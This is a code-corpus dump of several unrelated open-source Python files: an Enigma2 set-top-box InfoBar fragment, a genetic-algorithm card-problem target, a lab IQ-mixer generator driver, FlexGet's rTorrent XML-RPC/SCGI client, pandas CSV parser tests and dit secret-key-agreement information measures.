InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \ InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \ InfoBarHdmi, setResumePoint, delResumePoint from Screens.ButtonSetup import InfoBarButtonSetup profile("LOAD:InitBar_Components") from Components.ActionMap import HelpableActionMap from Components.Timeshift import InfoBarTimeshift from Components.config import config from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase profile("LOAD:HelpableScreen") from Screens.HelpMenu import HelpableScreen class InfoBar(InfoBarBase, InfoBarShowHide, InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton, HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer, InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, InfoBarHdmi, Screen, InfoBarButtonSetup): ALLOW_SUSPEND = True instance = None def __init__(self, session): Screen.__init__(self, session) if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')): self.skinName = "OPD-Blue-Line/skin.xml" self["actions"] = HelpableActionMap(self, "InfobarActions", { "showMovies": (self.showMovies, _("Play recorded movies...")), "showRadio": (self.showRadioButton, _("Show the radio player...")), "showTv": (self.showTvButton, _("Show the tv player...")), "toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")), "openBouquetList": (self.openBouquetList, _("Open bouquetlist...")), "showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")), "openBouquetList": (self.openBouquetList, _("open 
bouquetlist")), "openWeather": (self.openWeather, _("Open Weather...")), "openTimerList": (self.openTimerList, _("Open Timerlist...")), "openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")), "openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")), "openIMDB": (self.openIMDB, _("Open IMDB...")), "showMC": (self.showMediaCenter, _("Show the media center...")), "openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")), 'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')), 'ZoomOff': (self.ZoomOff, _('Zoom Off...')), 'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')), "showWWW": (self.showPORTAL, _("Open MediaPortal...")), "showSetup": (self.showSetup, _("Show setup...")), "showFormat": (self.showFormat, _("Show Format Setup...")), "showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")), "showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")), }, prio=2) self["key_red"] = Label() self["key_yellow"] = Label() self["key_blue"] = Label() self["key_green"] = Label() self.allowPiP = True self.radioTV = 0 for x in HelpableScreen, \ InfoBarBase, InfoBarShowHide, \ InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \ InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \ InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \ InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \ InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \ InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup: x.__init__(self) self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))])) self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))])) self.__event_tracker = ServiceEventTracker(screen=self, eventmap= { enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged }) self.current_begin_time=0 assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!" InfoBar.instance = self if config.misc.initialchanne
lselectio
n.value: self.onShown.append(self.showMenu) self.zoomrate = 0 self.zoomin = 1 self.onShow.append(self.doButtonsCheck) def showMenu(self): self.onShown.remove(self.showMenu) config.misc.initialchannelselection.value = False config.misc.initialchannelselection.save() self.mainMenu() def doButtonsCheck(self): if config.plisettings.ColouredButtons.value: self["key_yellow"].setText(_("Extensions")) if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None": self["key_red"].setText(_("Single EPG")) else: self["key_red"].setText(_("ViX EPG")) if not config.plisettings.Subservice.value: self["key_green"].setText(_("Timers")) else: self["key_green"].setText(_("Green Panel")) self["key_blue"].setText(_("Blue Panel")) def __onClose(self): InfoBar.instance = None def __eventInfoChanged(self): if self.execing: service = self.session.nav.getCurrentService() old_begin_time = self.current_begin_time info = service and service.info() ptr = info and info.getEvent(0) self.current_begin_time = ptr and ptr.getBeginTime() or 0 if config.usage.show_infobar_on_event_change.value: if old_begin_time and old_begin_time != self.current_begin_time: self.doShow() def __checkServiceStarted(self): self.__serviceStarted(True) self.onExecBegin.remove(self.__checkServiceStarted) def serviceStarted(self): #override from InfoBarShowHide new = self.servicelist.newServicePlayed() if self.execing: InfoBarShowHide.serviceStarted(self) self.current_begin_time=0 elif not self.__checkServiceStarted in self.onShown and new: self.onShown.append(self.__checkServiceStarted) def __checkServiceStarted(self): self.serviceStarted() self.onShown.remove(self.__checkServiceStarted) def openBouquetList(self): if config.usage.tvradiobutton_mode.value == "MovieList": self.showTvChannelList(True) self.showMovies() elif con
AechPro/Machine-Learning
Partners Healthcare/2016 Breast Cancer/dev/ReconNet/optimization/targets/Card_Problem_Target.py
Python
apache-2.0
1,157
0.012965
class target(object):
    def __init__(self):
        self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2"
        self.canAdd = False
        self.canRemove = False
        self.initializationType = "sequential"
        self.encodingTable = None
        self.group1 = []
        self.group2 = []

    def build_from_genome(self, genome):
        assert genome is not None, "Null genome passed to target!"
        self.group1 = genome[0][1:]
        self.group2 = genome[1][1:]
        # self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize]

    def evaluate(self):
        genes = []
        m = 1
        s = 0
        for arg in self.group1:
            s += arg
            genes.append(arg)
        for arg in self.group2:
            m *= arg
            genes.append(arg)
        duplicateCount = len(genes) - len(set(genes))
        m -= 360
        s -= 36
        fitness = -(abs(m) + abs(s)) - duplicateCount
        # print("\nFITNESS:", fitness, "\n")
        return fitness

    def validate_genome(self, genome):
        return True
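The fitness function encodes the classic card problem: split the cards 1-10 into one pile summing to 36 and one multiplying to 360, with duplicate cards penalized. A hand-worked sketch on one illustrative split (not an actual GA result):

# Fitness of one candidate split of the cards 1..10, worked by hand.
group1 = [2, 7, 8, 9, 10]          # sum pile, target 36
group2 = [1, 3, 4, 5, 6]           # product pile, target 360
s = sum(group1) - 36               # 36 - 36 = 0
m = 1
for card in group2:
    m *= card                      # 1*3*4*5*6 = 360
m -= 360
duplicates = len(group1 + group2) - len(set(group1 + group2))
fitness = -(abs(m) + abs(s)) - duplicates
print(fitness)                     # 0 -> a perfect split
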
vdrhtc/Measurement-automation
drivers/IQVectorGenerator.py
Python
gpl-3.0
12,060
0.001244
from math import ceil import numpy as np from ipywidgets import widgets from tqdm.notebook import tqdm from matplotlib import pyplot as plt import lib.iq_mixer_calibration from drivers import IQAWG from lib.data_management import load_IQMX_calibration_database, \ save_IQMX_calibration from lib.iq_mixer_calibration import IQCalibrator class IQVectorGenerator: def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG", default_calibration_power=-30, marker_period_divisor=None, slave_iqvgs=None, calibration_step=10e6): """ Parameters ---------- lo iq_awg sa calibration_db_name default_calibration_power marker_period_divisor: int, ns by default, the marker period should be divisible by the if_period however, in some cases other divisor may be required, i.e. when m3202 is used with PXICLK10 trigger sync mode this divisor should be set to 100 """ self._name = name self._lo = lo self._iqawg = iq_awg self._sa = sa self._cal_db_name = calibration_db_name self._default_calibration_power = default_calibration_power self._calibration_widget = widgets.HTML() self._recalibrate_mixer = False self._frequency = 5e9 self.set_if_frequency(100e6) if marker_period_divisor is not None: self._marker_period_divisor = marker_period_divisor else: self._marker_period_divisor = self._if_period # for marker period synchronization when iqvgs are on the same AWG self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else [] self._power = default_calibration_power self._dac_overridden = False self._current_cal = None self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None self._cal_db = None self._marker_period = None self._requested_marker_period = None self.set_marker_period(1000) self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2), "if_amplitudes": (.1, .1), "if_phase": -np.pi * 0.54} self._calibration_step = calibration_step self._calibration_test_data = [] self._load_cal_db() def get_calibration_widget(self): return self._calibration_widget def set_parameters(self, parameters_dict): if "power" in parameters_dict: self.set_power(parameters_dict["power"]) if "freq" in parameters_dict: self.set_frequency(parameters_dict["freq"]) if "dac_overridden" in parameters_dict: self._dac_overridden = parameters_dict["dac_overridden"] else: self._dac_overridden = False def get_iqawg(self): self._iqawg.set_parameters( {'calibration': self._current_cal}) # ensure return self._iqawg def set_if_frequency(self, if_frequency): self._if_frequency = if_frequency self._if_period = 1 / if_frequency * 1e9 # ns def get_if_frequency(self): return self._if_frequency def set_output_state(self, state): self._lo.set_output_state(state) def set_frequency(self, freq): self._frequency = freq self._lo.set_frequency(self._frequency + self._if_frequency) self._requested_cal = self.get_calibration(self._frequency, self._power) self._output_SSB() def set_power(self, power): if power > self._default_calibration_power + 10: raise ValueError("Power can be % dBm max, requested %d dBm" % ( self._default_calibration_power + 10, power)) self._power = power self._requested_cal = self.get_calibration(self._frequency, self._power) self._lo.set_power(self._requested_cal.get_lo_power()) self._output_SSB() def get_power(self): return self._power def set_marker_period(self, marker_period): ''' For some applications there is need to control the length of the interval between triggers output by the AWG of the IQVectorGenerator. 
Parameters ---------- marker_period: ns, float real trigger period will be recalculated to be not shorter than <marker_period> ns, but still divis
ible by the IF period ''' self._requested_marker_period = marker_period correct_marker_period = ceil( marker_period / self._marker_period_divisor) * \ self._marker_period_divisor if correct_marker_period != self._marker_period: self._marker_period = correct_marker_period if self._re
quested_cal is not None: self._current_cal = None self._output_SSB() for slave_iqvg in self._slave_iqvgs: slave_iqvg.set_marker_period(self._marker_period) def _output_SSB(self): if self._requested_cal != self._current_cal: # print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz" # f", power: {self._power} dBm.") self._iqawg.set_parameters({"calibration": self._requested_cal}) pb = self._iqawg.get_pulse_builder() if_freq = self._requested_cal.get_radiation_parameters()[ "if_frequency"] resolution = self._requested_cal.get_radiation_parameters()[ "waveform_resolution"] if_period = 1 / if_freq * 1e9 if (if_period * 1e9) % resolution != 0: print( f"IQVectorGenerator {self._name} warning: IF period is not divisible by " "calibration waveform resolution. Phase coherence will be bad.") seq = pb.add_sine_pulse(self._marker_period).build() self._iqawg.output_pulse_sequence(seq) self._current_cal = self._requested_cal # time.sleep(1) def _load_cal_db(self): self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0) def _around_frequency(self, frequency): # return ceil(frequency/self._calibration_step)*self._calibration_step return round(frequency / self._calibration_step) * self._calibration_step def get_calibration(self, frequency, power): frequency = self._around_frequency(frequency) # frequency = round(frequency/self._calibration_step)*self._calibration_step if self._cal_db is None: self._load_cal_db() cal = \ self._cal_db.get(frozenset(dict(lo_power=14, ssb_power=self._default_calibration_power, lo_frequency=self._if_frequency + frequency, if_frequency=self._if_frequency, waveform_resolution=1, sideband_to_maintain='left').items())) if (cal is None) or self._recalibrate_mixer: calibrator = IQCalibrator(self._iqawg, self._sa, self._lo, self._cal_db_name, 0, sidebands_to_suppress=6, output_widget=self._calibration_widget) ig = self._calibration_initial_guess cal = calibrator.calibrate( lo_frequency=frequency + self._if_frequency, if_frequency=self._if_frequency, lo_power=14, ssb_power=self._default_calibration_power, waveform_resolution=1, iterations=3, minimize_iterlimit=100, sa_res_bandwidth=300, initial_guess=ig) save_IQMX_calibration(cal)
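The marker-period correction in set_marker_period is plain ceiling-rounding to a multiple of the divisor. A minimal sketch, assuming a 10 ns divisor (the IF period of the default 100 MHz IF):

# Ceiling-round the requested marker period, as set_marker_period does.
from math import ceil

def correct_marker_period(requested_ns, divisor_ns=10.0):   # 10 ns = 1/(100 MHz)
    return ceil(requested_ns / divisor_ns) * divisor_ns

print(correct_marker_period(1000))   # 1000.0 -> already divisible
print(correct_marker_period(1003))   # 1010.0 -> never shorter than requested
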
qk4l/Flexget
flexget/plugins/clients/rtorrent.py
Python
mit
26,286
0.001902
from __future__ import unicode_literals, division, absolute_import from builtins import * # noqa pylint: disable=unused-import, redefined-builtin from future.moves.xmlrpc import client as xmlrpc_client from future.moves.urllib.parse import urlparse, urljoin from future.utils import native_str import logging import os import socket import re from time import sleep from flexget.utils.template import RenderError from flexget.utils.pathscrub import pathscrub from flexget import plugin from flexget.event import event from flexget.entry import Entry from flexget.config_schema import one_or_more from flexget.utils.bittorrent import Torrent, is_torrent_file from requests.auth import HTTPDigestAuth, HTTPBasicAuth log = logging.getLogger('rtorrent') class _Method(object): # some magic to bind an XML-RPC method to an RPC server. # supports "nested" methods (e.g. examples.getStateName) def __init__(self, send, name): self.__send = send self.__name = name def __getattr__(self, name): return _Method(self.__send, "%s.%s" % (self.__name, name)) def __call__(self, *args): return self.__send(self.__name, args) class HTTPDigestTransport(xmlrpc_client.Transport): """ Transport that uses requests to support Digest authentication. """ def __init__(self, scheme, digest_auth, username, password, session, *args, **kwargs): self.__scheme = scheme self.__session = session self.__digest_auth = digest_auth self.__username = username self.__password = password self.verbose = 0 xmlrpc_client.Transport.__init__(self, *args, **kwargs) # old style class def request(self, host, handler, request_body, verbose=False): return self.single_request(host, handler, request_body, verbose) def single_request(self, host, handler, request_body, verbose=0): url = urljoin('{0}://{1}'.format(self.__scheme, host), handler) auth = self.get_auth() response = self.send_request(url, auth, request_body) # if status code is 401, it means we used the wrong auth method if response.status_code == 401: log.warning('%s auth failed. Retrying with %s. Please change your config.', 'Digest' if self.__digest_auth else 'Basic', 'Basic' if self.__digest_auth else 'Digest') self.__digest_auth = not self.__digest_auth auth = self.get_auth() response = self.send_request(url, auth, request_body) response.raise_for_status() return self.parse_response(response) def get_auth(self): if self.__digest_auth: return HTTPDigestAuth(self.__username, self.__password) return HTTPBasicAuth(self.__username, self.__password) def send_request(self, url, auth, data): return self.__session.post(url, auth=auth, data=data, raise_status=False) def parse_response(self, response): p, u = self.getparser() if self.verbose: log.info('body: %s', repr(response)) p.feed(response.content) p.close() return u.close() class SCGITra
nsport(xmlrpc_client.Transport): """ Used to override the default xmlrpclib transport to support SCGI """ def __init__(self, *args, **kwargs): self.verbose = 0 xmlrpc_client.Transport.__init__(self, *args, **kwargs) def request(self, host, handler, requ
est_body, verbose=False): return self.single_request(host, handler, request_body, verbose) def single_request(self, host, handler, request_body, verbose=0): # Add SCGI headers to the request. headers = [('CONTENT_LENGTH', native_str(len(request_body))), ('SCGI', '1')] header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00' header = '%d:%s' % (len(header), header) request_body = '%s,%s' % (header, request_body) sock = None try: if host: parsed_host = urlparse(host) host = parsed_host.hostname port = parsed_host.port addr_info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(*addr_info[0][:3]) sock.connect(addr_info[0][4]) else: sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.connect(handler) self.verbose = verbose sock.sendall(request_body.encode()) return self.parse_response(sock.makefile()) finally: if sock: sock.close() def parse_response(self, response): p, u = self.getparser() response_body = '' while True: data = response.read(1024) if not data: break response_body += data if self.verbose: log.info('body: %s', repr(response_body)) # Remove SCGI headers from the response. _, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1) p.feed(response_body) p.close() return u.close() class SCGIServerProxy(object): """ Enable connection to SCGI proxy """ def __init__(self, uri, transport=None, encoding=None, verbose=False, allow_none=False, use_datetime=False): parsed_url = urlparse(uri) self.__host = uri if parsed_url.scheme else None self.__handler = parsed_url.path if not self.__handler: self.__handler = '/' if not transport: transport = SCGITransport(use_datetime=use_datetime) self.__transport = transport self.__encoding = encoding or 'utf-8' self.__verbose = verbose self.__allow_none = allow_none def __close(self): self.__transport.close() def __request(self, method_name, params): # call a method on the remote server request = xmlrpc_client.dumps(params, method_name, encoding=self.__encoding, allow_none=self.__allow_none).encode(self.__encoding) response = self.__transport.request( self.__host, self.__handler, request.decode('utf-8'), verbose=self.__verbose ) if len(response) == 1: response = response[0] return response def __repr__(self): return ( "<ServerProxy for %s%s>" % (self.__host, self.__handler) ) __str__ = __repr__ def __getattr__(self, name): # magic method dispatcher return _Method(self.__request, name) # note: to call a remote object with an non-standard name, use # result getattr(server, "strange-python-name")(args) def __call__(self, attr): """A workaround to get special attributes on the ServerProxy without interfering with the magic __getattr__ """ if attr == "close": return self.__close elif attr == "transport": return self.__transport raise AttributeError("Attribute %r not found" % (attr,)) class RTorrent(object): """ rTorrent API client """ default_fields = ( 'hash', 'name', 'up_total', 'down_total', 'down_rate', 'is_open', 'is_active', 'custom1', 'custom2', 'custom3', 'custom4', 'custom5', 'state', 'complete', 'bytes_done', 'down.rate', 'left_bytes', 'ratio', 'base_path', 'load_date' ) required_fields = ( 'hash', 'name', 'base_path' ) def __init__(self, uri, username=None, password=None, digest_auth=None, session=None): """ New connection to rTorrent :param uri: RTorrent URL. 
Supports both http(s) and scgi :param username: Username for basic auth over http(s) :param password: Password for basic auth over http(s) """ self.uri = uri self.username = username self.password = password self.digest_auth = digest_auth
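The SCGI framing assembled in SCGITransport.single_request is a netstring of NUL-separated headers followed by the request body. A standalone sketch of the same framing (the XML-RPC body is a placeholder):

# SCGI netstring framing, reproduced outside the transport class.
request_body = '<?xml version="1.0"?><methodCall>...</methodCall>'   # placeholder

headers = [('CONTENT_LENGTH', str(len(request_body))), ('SCGI', '1')]
header = '\x00'.join('%s\x00%s' % (k, v) for k, v in headers) + '\x00'
framed = '%d:%s' % (len(header), header) + ',' + request_body
print(repr(framed[:34]))   # netstring length prefix, then the NUL-separated headers
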
rs2/pandas
pandas/tests/io/parser/test_python_parser_only.py
Python
bsd-3-clause
9,378
0.000746
""" Tests that apply specifically to the Python parser. Unless specifically stated as a Python-specific issue, the goal is to eventually move as many of these tests out of this module as soon as the C parser can accept further arguments when parsing. """ import csv from io import ( BytesIO, StringIO, ) import pytest from pandas.errors import ParserError from pandas import ( DataFrame, Index, MultiIndex, ) import pandas._testing as tm def test_default_separator(python_parser_only): # see gh-17333 # # csv.Sniffer in Python treats "o" as separator. data = "aob\n1o2\n3o4" parser = python_parser_only expected = DataFrame({"a": [1, 3], "b": [2, 4]}) result = parser.read_csv(StringIO(data), sep=None) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("skipfooter", ["foo", 1.5, True]) def test_invalid_skipfooter_non_int(python_parser_only, skipfooter): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter must be an integer" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=skipfooter) def test_invalid_skipfooter_negative(python_parser_only): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter cannot be negative" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=-1) @pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}]) def test_sniff_delimiter(python_parser_only, kwargs): data = """index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 ""
" parser = pyt
hon_parser_only result = parser.read_csv(StringIO(data), index_col=0, **kwargs) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_sniff_delimiter_comment(python_parser_only): data = """# comment line index|A|B|C # comment line foo|1|2|3 # ignore | this bar|4|5|6 baz|7|8|9 """ parser = python_parser_only result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#") expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("encoding", [None, "utf-8"]) def test_sniff_delimiter_encoding(python_parser_only, encoding): parser = python_parser_only data = """ignore this ignore this too index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 """ if encoding is not None: from io import TextIOWrapper data = data.encode(encoding) data = BytesIO(data) data = TextIOWrapper(data, encoding=encoding) else: data = StringIO(data) result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_single_line(python_parser_only): # see gh-6607: sniff separator parser = python_parser_only result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None) expected = DataFrame({"a": [1], "b": [2]}) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}]) def test_skipfooter(python_parser_only, kwargs): # see gh-6607 data = """A,B,C 1,2,3 4,5,6 7,8,9 want to skip this also also skip this """ parser = python_parser_only result = parser.read_csv(StringIO(data), **kwargs) expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")] ) def test_decompression_regex_sep(python_parser_only, csv1, compression, klass): # see gh-6607 parser = python_parser_only with open(csv1, "rb") as f: data = f.read() data = data.replace(b",", b"::") expected = parser.read_csv(csv1) module = pytest.importorskip(compression) klass = getattr(module, klass) with tm.ensure_clean() as path: tmp = klass(path, mode="wb") tmp.write(data) tmp.close() result = parser.read_csv(path, sep="::", compression=compression) tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index(python_parser_only): # see gh-6607 data = """ A B C D E one two three four a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640 a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744 x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838""" parser = python_parser_only expected = DataFrame( [ [-0.5109, -2.3358, -0.4645, 0.05076, 0.3640], [0.4473, 1.4152, 0.2834, 1.00661, 0.1744], [-0.6662, -0.5243, -0.3580, 0.89145, 2.5838], ], columns=["A", "B", "C", "D", "E"], index=MultiIndex.from_tuples( [("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)], names=["one", "two", "three", "four"], ), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index2(python_parser_only): # see gh-6893 data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9" parser = python_parser_only expected = DataFrame.from_records( [(1, 3, 7, 0, 3, 6), 
(3, 1, 4, 1, 5, 9)], columns=list("abcABC"), index=list("abc"), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("add_footer", [True, False]) def test_skipfooter_with_decimal(python_parser_only, add_footer): # see gh-6971 data = "1#2\n3#4" parser = python_parser_only expected = DataFrame({"a": [1.2, 3.4]}) if add_footer: # The stray footer line should not mess with the # casting of the first two lines if we skip it. kwargs = {"skipfooter": 1} data += "\nFooter" else: kwargs = {} result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"] ) @pytest.mark.parametrize( "encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"] ) def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding): # see gh-3404 expected = DataFrame({"a": [1], "b": [2]}) parser = python_parser_only data = "1" + sep + "2" encoded_data = data.encode(encoding) result = parser.read_csv( BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE]) def test_multi_char_sep_quotes(python_parser_only, quoting): # see gh-13374 kwargs = {"sep": ",,"} parser = python_parser_only data = 'a,,b\n1,,a\n2,,"2,,b"' if quoting == csv.QUOTE_NONE: msg = "Expected 2 fields in line 3, saw 3" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) else: msg = "ignored when a multi-char delimiter is used" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) def test_none_delimiter(python_parser_only, capsys): # see gh-13374 and gh-17465 parser = python_parser_only data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9" expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]}) # We expect the third line in the data to be # skipped because it is malformed, but we do # not expect any e
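The sniffing behaviour these tests exercise is reachable directly through the public API: passing sep=None with the Python engine lets csv.Sniffer infer the delimiter. A minimal sketch:

# Delimiter sniffing: sep=None plus the Python engine invokes csv.Sniffer.
from io import StringIO
import pandas as pd

data = "index|A|B|C\nfoo|1|2|3\nbar|4|5|6\n"
df = pd.read_csv(StringIO(data), sep=None, engine="python", index_col=0)
print(df.loc["foo", "B"])   # 2
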
dit/dit
dit/pid/measures/iskar.py
Python
bsd-3-clause
4,845
0.001032
""" The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent. The idea is to measure unique information as the intrinsic mutual information between and source and the target, given the other sources. It turns out that these unique values are inconsistent, in that they produce differing redundancy values. """ from ..pid import BaseUniquePID from ...multivariate.secret_key_agreement import ( no_communication_skar, one_way_skar, two_way_skar, ) from ...utils import flatten __all__ = ( 'PID_SKAR_nw', 'PID_SKAR_owa', 'PID_SKAR_owb', 'PID_SKAR_tw', ) class PID_SKAR_nw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_>-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_nw : dict The value of I_SKAR_nw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = no_communication_skar(d, source, target, others) return uniques class PID_SKAR_owa(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, source to target. """ _name = "I_>->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-> Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owa : dict The value of I_SKAR_owa for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, source, target, others) return uniques class PID_SKAR_owb(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, target to source. """ _name = "I_<-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-< Y || X_1). Parameters ---------
- d : Distribution The distribution to compute I_SKAR for. sources : iterable
of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owb : dict The value of I_SKAR_owb for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, target, source, others) return uniques class PID_SKAR_tw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_<->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-> Y || X_1), when possible. Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_tw : dict The value of I_SKAR_tw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = two_way_skar(d, [source, target], others) return uniques
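All four _measure implementations share the same bookkeeping: for each source, condition on every other source, flattened into one variable list. A stripped-down sketch of just that loop (the index tuples are illustrative):

# The shared source/others bookkeeping, outside any dit machinery.
from itertools import chain

sources = [(0,), (1, 2)]
for source in sources:
    others = list(chain.from_iterable(s for s in sources if s != source))
    print(source, '||', others)   # (0,) || [1, 2]   then   (1, 2) || [0]
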
scholer/cadnano2.5
cadnano/tests/functionaltest_gui.py
Python
mit
1,997
0.001502
# To run:
